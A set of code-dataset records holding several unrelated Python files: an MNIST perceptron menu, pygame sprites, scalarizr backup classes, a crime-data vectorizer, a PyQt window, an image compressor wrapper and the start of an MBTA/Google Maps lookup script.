input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n    train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,500,1,6)\n\n    print(\"(a). Accuracy for classifying digits 1 and 6\\n(b). Accuracy plot with number of iterations for classifying digits 1 and 6\\n(c). Visualization of learned model for digits 1 and 6\\n(d). Visualization of 20 best and worst scoring images\\n(e). Random flip for 10% of training data\\n(f). Visualization of sorted training data\\n(g). Accuracy plot for digits 2 and 8\\n(h). Weight vector Visualization for digits 2 and 8\\n(i). 
print(\"(a). Accuracy for classifying digits 1 and 6\\n(b). Accuracy plot with number of iterations for classifying digits 1 and 6\\n(c). Visualization of learned model for digits 1 and 6\\n(d). Visualization of 20 best and worst scoring images\\n(e). Random flip for 10% of training data\\n(f). Visualization of sorted training data\\n(g). Accuracy plot for digits 2 and 8\\n(h). Weight vector visualization for digits 2 and 8\\n(i). Accuracy plot with 10 training examples\\n\")\n\n    choice = input(\"***Please enter your choice from a to i***\")\n    if choice == 'a':\n        accuracy = perceptron(train_images,train_labels,test_images,test_labels,6)[0]\n        print(\"Accuracy for classifying digits 1 and 6 is:\",accuracy)\n    elif choice == 'b':\n        accuracy_iteration(train_images,train_labels,test_images,test_labels,10,1,6)\n        print(\"Accuracy-iteration plot for digits 1 and 6 plotted!\")\n    elif choice == 'c':\n        visualize_weight_vector(train_images,train_labels,test_images,test_labels,10,1,6)\n        print(\"Learned model for digits 1 and 6 plotted!\")\n    elif choice == 'd':\n        print(\"Image plot for best and worst 20 images\")\n        get_score(train_images,train_labels,test_images,test_labels,10,1,6)\n    elif choice == 'e':\n        accuracy_random = random_flip(train_images,train_labels,test_images,test_labels,10)\n        print(\"Accuracy for classifying digits 1 and 6 with 10% random flip\",accuracy_random)\n        print(\"Accuracy plot with 10% error plotted!\")\n    elif choice == 'f':\n        train_images_sorted,train_labels_sorted,test_images_sorted,test_labels_sorted = extract_data(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,1,6)\n        sorted_data_visualization(train_images_sorted,train_labels_sorted,test_images_sorted,test_labels_sorted,10,1,6)\n        print(\"Accuracy plot with sorted data plotted!\")\n    elif choice == 'g':\n        train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,500,2,8)\n        accuracy_iteration(train_images,train_labels,test_images,test_labels,10,2,8)\n        print(\"Accuracy-iteration plot for digits 2 and 8 plotted!\")\n    elif choice == 'h':\n        train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,500,2,8)\n        accuracy = perceptron(train_images,train_labels,test_images,test_labels,10)[0]\n        print(\"Accuracy for digits 2 and 8\",accuracy)\n        visualize_weight_vector(train_images,train_labels,test_images,test_labels,10,2,8)\n        print(\"Learned model for digits 2 and 8 plotted!\")\n    elif choice == 'i':\n        train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,5,1,6)\n        accuracy = perceptron(train_images,train_labels,test_images,test_labels,10)[0]\n        print(\"Accuracy with 10 training examples\",accuracy)\n        accuracy_iteration(train_images,train_labels,test_images,test_labels,10,1,6)\n        print(\"Plot for 10 training examples plotted!\")\n\n\n\n\n\nif __name__ == \"__main__\":\n    main()\n", "sub_path": "perceptron.py", "file_name": "perceptron.py", "file_ext": "py", "file_size_in_byte": 13686, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "tensorflow.compat.v1.Session", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.placeholder", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.placeholder", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 37, "usage_type": "attribute"}, {"api_name": 
"tensorflow.compat.v1.placeholder", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.multiply", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 106, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "operator.itemgetter", "line_number": 178, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 208, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 221, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 221, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 238, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 238, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 239, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 241, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 241, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 268, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 269, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 269, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 296, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 296, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 297, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 297, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 298, "usage_type": "name"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data.read_data_sets", "line_number": 305, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data", "line_number": 305, "usage_type": "name"}]} {"seq_id": "303478693", "text": "import random\nimport itertools\nimport pygame as pg\n\nimport prepare\nimport tools\n\n\nSPRITE_SIZE = (32, 36)\n\n\nclass RPGSprite(pg.sprite.Sprite):\n \"\"\"Base class for player and AI sprites.\"\"\"\n def __init__(self, pos, speed, name, facing=\"DOWN\", *groups):\n super(RPGSprite, self).__init__(*groups)\n self.speed = speed\n self.name = name\n self.direction = facing\n self.old_direction = None \n self.direction_stack = [] \n self.redraw = True \n self.animate_timer = 0.0\n self.animate_fps = 10.0\n self.walkframes = None\n self.walkframe_dict = self.make_frame_dict(self.get_frames(name))\n self.adjust_images()\n self.rect = self.image.get_rect(center=pos)\n\n def get_frames(self, character):\n \"\"\"Get a list of all frames.\"\"\"\n sheet = prepare.GFX[character]\n all_frames = tools.split_sheet(sheet, SPRITE_SIZE, 3, 4)\n return all_frames\n\n def make_frame_dict(self, frames):\n \"\"\"Create a dictionary of animation cycles for each direction.\"\"\"\n frame_dict = {}\n for i,direct in enumerate(prepare.DIRECTIONS):\n frame_dict[direct] = itertools.cycle([frames[i][0], frames[i][2]])\n return frame_dict\n\n def adjust_images(self, now=0):\n \"\"\"Update the sprites walkframes as the sprite's direction changes.\"\"\"\n if self.direction != self.old_direction:\n self.walkframes = self.walkframe_dict[self.direction]\n self.old_direction = self.direction\n self.redraw = True\n self.make_image(now)\n\n def make_image(self, now):\n \"\"\"Update the sprite's animation as needed.\"\"\"\n if self.redraw or now-self.animate_timer > 1000/self.animate_fps:\n self.image = next(self.walkframes)\n self.animate_timer = now\n self.redraw = False\n\n def add_direction(self, direction):\n \"\"\"\n Add direction to the sprite's direction stack and change current\n direction.\n \"\"\"\n if direction in self.direction_stack:\n self.direction_stack.remove(direction)\n self.direction_stack.append(direction)\n self.direction = direction\n\n def pop_direction(self, direction):\n \"\"\"\n Remove direction from 
direction stack and change current direction\n        to the top of the stack (if not empty).\n        \"\"\"\n        if direction in self.direction_stack:\n            self.direction_stack.remove(direction)\n        if self.direction_stack:\n            self.direction = self.direction_stack[-1]\n\n    def update(self, now, screen_rect):\n        \"\"\"Update image and position of sprite.\"\"\"\n        self.adjust_images(now)\n        if self.direction_stack:\n            direction_vector = prepare.DIRECT_DICT[self.direction]\n            self.rect.x += self.speed*direction_vector[0]\n            self.rect.y += self.speed*direction_vector[1]\n\n    def draw(self, surface):\n        \"\"\"Draw sprite to surface (not used if using group draw functions).\"\"\"\n        surface.blit(self.image, self.rect)\n    \n\nclass Player(RPGSprite):\n    \"\"\"This class will represent the user controlled character.\"\"\"\n    def __init__(self, pos, speed, name=\"warrior_m\", facing=\"DOWN\", *groups):\n        super(Player, self).__init__(pos, speed, name, facing, *groups)\n\n    def get_event(self, event):\n        \"\"\"Handle events pertaining to player control.\"\"\"\n        if event.type == pg.KEYDOWN:\n            self.add_direction(event.key)\n        elif event.type == pg.KEYUP:\n            self.pop_direction(event.key)\n\n    def update(self, now, screen_rect):\n        \"\"\"Call base classes update method and clamp player to screen.\"\"\"\n        super(Player, self).update(now, screen_rect)\n        self.rect.clamp_ip(screen_rect)\n\n    def add_direction(self, key):\n        \"\"\"Add direction to stack if corresponding key is pressed.\"\"\"\n        if key in prepare.CONTROLS:\n            super(Player, self).add_direction(prepare.CONTROLS[key])\n\n    def pop_direction(self, key):\n        \"\"\"Remove direction from stack if corresponding key is released.\"\"\"\n        if key in prepare.CONTROLS:\n            super(Player, self).pop_direction(prepare.CONTROLS[key])\n\n\nclass AISprite(RPGSprite):\n    \"\"\"A non-player controlled sprite.\"\"\"\n    def __init__(self, pos, speed, name, facing, *groups):\n        super(AISprite, self).__init__(pos, speed, name, facing, *groups)\n        self.wait_range = (500, 2000)\n        self.wait_delay = random.randint(*self.wait_range)\n        self.wait_time = 0.0\n        self.change_direction()\n\n    def update(self, now, screen_rect):\n        \"\"\"\n        Choose a new direction if wait_time has expired or the sprite\n        attempts to leave the screen.\n        \"\"\"\n        if now-self.wait_time > self.wait_delay:\n            self.change_direction(now)\n        super(AISprite, self).update(now, screen_rect)\n        if not screen_rect.contains(self.rect):\n            self.change_direction(now)\n            self.rect.clamp_ip(screen_rect)\n\n    def change_direction(self, now=0):\n        \"\"\"\n        Empty the stack and choose a new direction. 
The sprite may also\n choose not to go idle (choosing direction=None)\n \"\"\"\n self.direction_stack = []\n direction = random.choice(prepare.DIRECTIONS+(None,))\n if direction:\n super(AISprite, self).add_direction(direction)\n self.wait_delay = random.randint(*self.wait_range)\n self.wait_time = now\n", "sub_path": "actors.py", "file_name": "actors.py", "file_ext": "py", "file_size_in_byte": 5462, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "pygame.sprite", "line_number": 12, "usage_type": "attribute"}, {"api_name": "prepare.GFX", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tools.split_sheet", "line_number": 32, "usage_type": "call"}, {"api_name": "prepare.DIRECTIONS", "line_number": 38, "usage_type": "attribute"}, {"api_name": "itertools.cycle", "line_number": 39, "usage_type": "call"}, {"api_name": "prepare.DIRECT_DICT", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 97, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 99, "usage_type": "attribute"}, {"api_name": "prepare.CONTROLS", "line_number": 109, "usage_type": "attribute"}, {"api_name": "prepare.CONTROLS", "line_number": 110, "usage_type": "attribute"}, {"api_name": "prepare.CONTROLS", "line_number": 114, "usage_type": "attribute"}, {"api_name": "prepare.CONTROLS", "line_number": 115, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 123, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 145, "usage_type": "call"}, {"api_name": "prepare.DIRECTIONS", "line_number": 145, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 148, "usage_type": "call"}]} {"seq_id": "610082893", "text": "from __future__ import with_statement\n\nimport sys\nimport logging\n\nfrom scalarizr import storage2, util\nfrom scalarizr.libs import bases\n\nLOG = logging.getLogger(__name__)\n\n\nclass Error(Exception):\n pass\n\n\nbackup_types = {}\nrestore_types = {}\n\n\ndef backup(*args, **kwds):\n if args:\n if isinstance(args[0], dict):\n return backup(**args[0])\n else:\n return args[0]\n type_ = kwds.get('type', 'base')\n try:\n cls = backup_types[type_]\n except KeyError:\n msg = \"Unknown backup type '%s'. \" \\\n \"Have you registered it in \" \\\n \"scalarizr.services.backup.backup_types?\" % type_\n raise Error(msg)\n return cls(**kwds)\n\n\ndef restore(*args, **kwds):\n if args:\n if isinstance(args[0], dict):\n return restore(**args[0])\n else:\n return args[0]\n type_ = kwds.get('type', 'base')\n try:\n cls = restore_types[type_]\n except KeyError:\n msg = \"Unknown restore type '%s'. \" \\\n \"Have you registered it in \" \\\n \"scalarizr.services.backup.restore_types?\" % type_\n raise Error(msg)\n return cls(**kwds)\n\n\nclass Backup(bases.Task):\n features = {\n 'start_slave': True\n }\n\n def __init__(self,\n type='base',\n description=None,\n tags=None,\n **kwds):\n super(Backup, self).__init__(\n type=type,\n description=description,\n tags=tags or {},\n **kwds)\n\n\nclass Restore(bases.Task):\n\n features = {\n 'master_binlog_reset': False\n }\n '''\n When 'master_binlog_reset' = False,\n rolling this restore on Master causes replication binary log reset.\n Slaves should start from the binary log head. 
Detecting the first\n position in binary log is implementation dependent and Master is\n responsible for this.\n '''\n\n def __init__(self,\n type='base',\n **kwds):\n super(Restore, self).__init__(\n type=type,\n **kwds)\n\n\nbackup_types['base'] = Backup\nrestore_types['base'] = Restore\n\n\nclass SnapBackup(Backup):\n\n def __init__(self,\n volume=None,\n **kwds):\n super(SnapBackup, self).__init__(\n volume=volume,\n **kwds)\n self.define_events(\n # Fires when all disk I/O activity should be freezed\n 'freeze',\n # Fires when all disk I/O activity should be resumed\n 'unfreeze'\n )\n\n def _run(self):\n self.volume = storage2.volume(self.volume)\n LOG.debug('Volume obj: %s', self.volume)\n LOG.debug('Volume config: %s', dict(self.volume))\n state = {}\n self.fire('freeze', self.volume, state)\n try:\n snap = self.volume.snapshot(self.description, tags=self.tags)\n finally:\n self.fire('unfreeze', self.volume, state)\n try:\n util.wait_until(lambda: snap.status() in (snap.COMPLETED, snap.FAILED),\n start_text='Polling snapshot status (%s)' % snap.id,\n logger=LOG)\n except:\n if 'Request limit exceeded' in str(sys.exc_info()[1]):\n pass\n else:\n raise\n if snap.status() == snap.FAILED:\n msg = 'Backup failed because snapshot %s failed' % snap.id\n raise Error(msg)\n return restore(\n type=self.type,\n snapshot=snap,\n **state)\n\n\nclass SnapRestore(Restore):\n\n def __init__(self, snapshot=None, volume=None, **kwds):\n super(SnapRestore, self).__init__(\n snapshot=snapshot,\n volume=volume,\n **kwds)\n\n\n def _run(self):\n self.snapshot = storage2.snapshot(self.snapshot)\n if self.volume:\n self.volume = storage2.volume(self.volume)\n self.volume.snap = self.snapshot\n self.volume.ensure()\n else:\n self.volume = self.snapshot.restore()\n return self.volume\n\n\nbackup_types['snap'] = SnapBackup\nrestore_types['snap'] = SnapRestore\n", "sub_path": "src/scalarizr/services/backup.py", "file_name": "backup.py", "file_ext": "py", "file_size_in_byte": 4450, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "scalarizr.libs.bases.Task", "line_number": 54, "usage_type": "attribute"}, {"api_name": "scalarizr.libs.bases", "line_number": 54, "usage_type": "name"}, {"api_name": "scalarizr.libs.bases.Task", "line_number": 71, "usage_type": "attribute"}, {"api_name": "scalarizr.libs.bases", "line_number": 71, "usage_type": "name"}, {"api_name": "scalarizr.storage2.volume", "line_number": 112, "usage_type": "call"}, {"api_name": "scalarizr.storage2", "line_number": 112, "usage_type": "name"}, {"api_name": "scalarizr.util.wait_until", "line_number": 122, "usage_type": "call"}, {"api_name": "scalarizr.util", "line_number": 122, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 126, "usage_type": "call"}, {"api_name": "scalarizr.storage2.snapshot", "line_number": 149, "usage_type": "call"}, {"api_name": "scalarizr.storage2", "line_number": 149, "usage_type": "name"}, {"api_name": "scalarizr.storage2.volume", "line_number": 151, "usage_type": "call"}, {"api_name": "scalarizr.storage2", "line_number": 151, "usage_type": "name"}]} {"seq_id": "295171598", "text": "import re\nimport sklearn as skl\nimport sklearn.preprocessing\n\ndef vectorize(data, label_column, features=[('time', 0), ('day', 0), ('month', 0), ('year', 0), ('day_of_week', 0), ('latitude', 7), ('longitude', 8)]):\n\t'''Generator function that extracts and returns a selectible 
set of features for each data point in the data parameter.\n\t\n\tReturns a vector containing values for the selected features. The order in the features parameter is indicative of the order in\n\tthe resulting vector (except when using the 'streets' feature, see below).\n\t\n\tdata\n\tdata is a sequence of subscriptables. Each subscriptable usually represents a line read from a .csv file.\n\t\n\tlabel_column\n\tlabel_column is None if the data is unlabeled. Otherwise, it is the index under which the label is found in each subscriptable.\n\tThe label is assumed to be a string and will be mapped to an integer unique to each unique string. This integer is appended as the\n\tlast element in the output vector.\n\tThere is one more thing about this parameter. If it is not none, the first element yielded by this generator function is a dictionary\n\tthat maps crime type strings to unambiguous ids. It is empty until more elements are extracted from this generator.\n\t\n\tfeatures\n\tfeatures is an iterable of 2-tuples (feature, index). It indicates\n\t- which features to extract (first part of each tuple)\n\t- under which index information needed for that feature is found (second part of each tuple)\n\t- in which order to place the features in the resulting feature vector (given by the order in the iterable)\n\t\n\tAvailable features are: 'time', 'day', 'month', 'year', 'day_of_week', 'latitude', 'longitude', 'streets'.\n\tThe features 'time', 'day', 'month', 'year' and 'day_of_week' are extracted from a time.struct_time object, so their associated\n\tindex in the (feature, index) tuple is usually identical. 'latitude' and 'longitude' are expected to be floats and are used 'as is'.\n\t\n\tThe 'streets' feature is a bit special in that it doesn't produce a single value in the output vector, but three. There are two types\n\tof street designation formats in the data set:\n\t- STREET_1 / STREET_2\n\t- Xth block of STREET\n\tIn the former case, two unique ids for the streets are appended to the output vector, followed by a -1. 
In the latter case, the street\n\tid and then the block number is appended to the vector, followed by a +1.\n\t'''\n\t\n\tstreet_type_1 = re.compile(r'(.+) / (.+)') # Regular expression to recognize street designations of the form 'STREET_1 / STREET_2'\n\tstreet_type_2 = re.compile(r'(.+) Block of (.+)') # as above, for ' Xth block of STREET'\n\tcrime_type_ids = {} # Dictionary unambiguously mapping crime type strings to integer ids\n\tcrime_type_counter = 0 # Counts how many different types of crime have been found.\n\tstreet_ids = {} # Dictionary unambiguously mapping street name strings to integer ids\n\tstreet_counter = 0 # Counts how many unique street names have been found.\n\t\n\t# Provide caller with the dictionary if appropriate.\n\tif label_column is not None:\n\t\tyield crime_type_ids\n\n\tfor data_point in data:\n\t\t# Get crime id from dictionary, or make new one if neccessary.\n\t\tif label_column is not None:\n\t\t\ttry:\n\t\t\t\tcrime_type_id = crime_type_ids[data_point[label_column]]\n\t\t\texcept KeyError:\n\t\t\t\tcrime_type_ids[data_point[label_column]] = crime_type_counter\n\t\t\t\tcrime_type_counter += 1\n\t\t\t\tcrime_type_id = crime_type_ids[data_point[label_column]]\n\t\t\n\t\t# Create vector and append all requested features\n\t\tvec = []\n\t\tfor feature, column in features:\n\t\t\tif feature == 'time':\n\t\t\t\ttime = data_point[column].tm_hour * 60 + data_point[column].tm_min # Time in minutes since 00:00\n\t\t\t\tvec.append(time)\n\t\t\telif feature == 'day':\n\t\t\t\tday = data_point[column].tm_mday\n\t\t\t\tvec.append(day)\n\t\t\telif feature == 'month':\n\t\t\t\tmonth = data_point[column].tm_mon\n\t\t\t\tvec.append(month)\n\t\t\telif feature == 'year':\n\t\t\t\tyear = data_point[column].tm_year\n\t\t\t\tvec.append(year)\n\t\t\telif feature == 'day_of_week':\n\t\t\t\tvec.append(data_point[column].tm_wday)\n\t\t\telif feature == 'latitude':\n\t\t\t\tvec.append(data_point[column])\n\t\t\telif feature == 'longitude':\n\t\t\t\tvec.append(data_point[column])\n\t\t\telif feature == 'streets':\n\t\t\t\ttype1_match = street_type_1.match(data_point[column])\n\t\t\t\tif type1_match is not None: # Street designation is of the form 'STREET_1 / STREET_2'\n\t\t\t\t\tstreet1, street2 = type1_match.group(1, 2) # fetch components\n\t\t\t\t\tif street1 not in street_ids: # Get / create street id\n\t\t\t\t\t\tstreet_ids[street1] = street_counter\n\t\t\t\t\t\tstreet_counter += 1\n\t\t\t\t\tif street2 not in street_ids: # Get / create street id\n\t\t\t\t\t\tstreet_ids[street2] = street_counter\n\t\t\t\t\t\tstreet_counter += 1\n\t\t\t\t\ts1_id = street_ids[street1]\n\t\t\t\t\ts2_id = street_ids[street2]\n\t\t\t\t\tvec.append(s1_id)\n\t\t\t\t\tvec.append(s2_id)\n\t\t\t\t\tvec.append(-1)\n\t\t\t\telse: # Street designation is of the form 'Xth block of STREET'\n\t\t\t\t\ttype2_match = street_type_2.match(data_point[column])\n\t\t\t\t\tif type2_match is not None:\n\t\t\t\t\t\tblock, street = type2_match.group(1, 2) # fetch components\n\t\t\t\t\t\tblock = int(block)\n\t\t\t\t\t\tif street not in street_ids: # Get / create street id\n\t\t\t\t\t\t\tstreet_ids[street] = street_counter\n\t\t\t\t\t\t\tstreet_counter += 1\n\t\t\t\t\t\ts_id = street_ids[street]\n\t\t\t\t\t\tvec.append(s_id)\n\t\t\t\t\t\tvec.append(block)\n\t\t\t\t\t\tvec.append(1)\n\t\t\t\t\telse: # Street designation is in neither format\n\t\t\t\t\t\traise 'Unknown street format: {0}'.format(data_point[6])\n\t\t\telse: # Caller has requested an unknown feature\n\t\t\t\traise 'Feature not supported!'\n\t\t\n\t\t# If data is 
\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "project/src/data_processing.py", "file_name": "data_processing.py", "file_ext": "py", "file_size_in_byte": 6686, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "re.compile", "line_number": 39, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 40, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.scale", "line_number": 142, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 142, "usage_type": "attribute"}]} {"seq_id": "252949470", "text": "#!/usr/bin/python3\n# -*- coding:utf-8 -*-\nimport sys\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QLabel, QWidget\n\n\nclass Example(QWidget):\n    def __init__(self):\n        super().__init__()\n        self.initUI()\n\n    def initUI(self):\n        label1 = QLabel(\"Label 1 \", self)\n        label1.move(10, 10)\n\n        label2 = QLabel(\"Label 2 \", self)\n        label2.move(20, 20)\n\n        label3 = QLabel(\"Label 3 \", self)\n        label3.move(30, 30)\n\n        self.setGeometry(100, 100, 500, 500)\n        self.setWindowTitle('absolute ')\n        self.show()\n\n    # def keyPressEvent(self, e):\n    #     if e.key() == Qt.Key_Escape:\n    #         self.close()\n\n    def keyPressEvent(self, e):\n        if e.key() == Qt.Key_Escape:\n            self.close()\n\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    ex = Example()\n    sys.exit(app.exec_())\n", "sub_path": "com/slkk/pyqt/escape.py", "file_name": "escape.py", "file_ext": "py", "file_size_in_byte": 884, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 8, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 14, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 17, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.Key_Escape", "line_number": 32, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 32, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 37, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 37, "usage_type": 
"attribute"}, {"api_name": "sys.exit", "line_number": 39, "usage_type": "call"}]} {"seq_id": "533837239", "text": "import numpy as np\nfrom multiprocessing import Queue, Value, Process\n\nfrom server.analysis.compressor._run import _run\n\n\nclass Compressor:\n def __init__(self):\n self._is_running = Value(\"i\", False)\n self._input_image_queue = Queue()\n self._output_image_queue = Queue()\n self._process = None\n\n def start(self):\n self._process = Process(\n target=_run,\n args=(self._input_image_queue, self._output_image_queue, self._is_running)\n )\n self._is_running.value = True\n self._process.start()\n\n def stop(self):\n if self._process is None:\n raise AttributeError(\"Compressor did not start yet, cannot stop\")\n\n self._is_running.value = False\n self._input_image_queue.put(np.empty((1, 1, 3), dtype=np.uint8))\n self._process.join()\n\n @property\n def input_queue(self) -> Queue:\n return self._input_image_queue\n\n @property\n def output_queue(self) -> Queue:\n return self._output_image_queue\n", "sub_path": "server/analysis/compressor/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1024, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "multiprocessing.Value", "line_number": 9, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 10, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 11, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 15, "usage_type": "call"}, {"api_name": "server.analysis.compressor._run._run", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 27, "usage_type": "attribute"}, {"api_name": "multiprocessing.Queue", "line_number": 31, "usage_type": "name"}, {"api_name": "multiprocessing.Queue", "line_number": 35, "usage_type": "name"}]} {"seq_id": "424640969", "text": "import urllib.request\nimport json\n# from googlemaps import GoogleMaps\nfrom pprint import pprint\n\n\n\n# Useful URLs (you need to add the appropriate parameters for your requests)\nGMAPS_BASE_URL = \"http://maps.googleapis.com/maps/api/geocode/json?\"\nMBTA_BASE_URL = \"http://realtime.mbta.com/developer/api/v2/stopsbylocation\"\nMBTA_DEMO_API_KEY = \"wX9NwuHnZU2ToO7GmGR9uw\"\n\n\n# A little bit of scaffolding if you want to use it\n\ndef get_json(url):\n \"\"\"\n Given a properly formatted URL for a JSON web API request, return\n a Python JSON object containing the response to that request.\n \"\"\"\n\n f = urllib.request.urlopen(url)\n response_text = f.read().decode('utf-8')\n response_data = json.loads(response_text)\n return response_data\n\n\n\n\ndef get_lat_long(place_name):\n \"\"\"\n Given a place name or address, return a (latitude, longitude) tuple\n with the coordinates of the given place.\n See https://developers.google.com/maps/documentation/geocoding/\n for Google Maps Geocode API URL formatting requirements.\n \"\"\"\n new_place = str()\n for letter in place_name:\n if letter is not ' 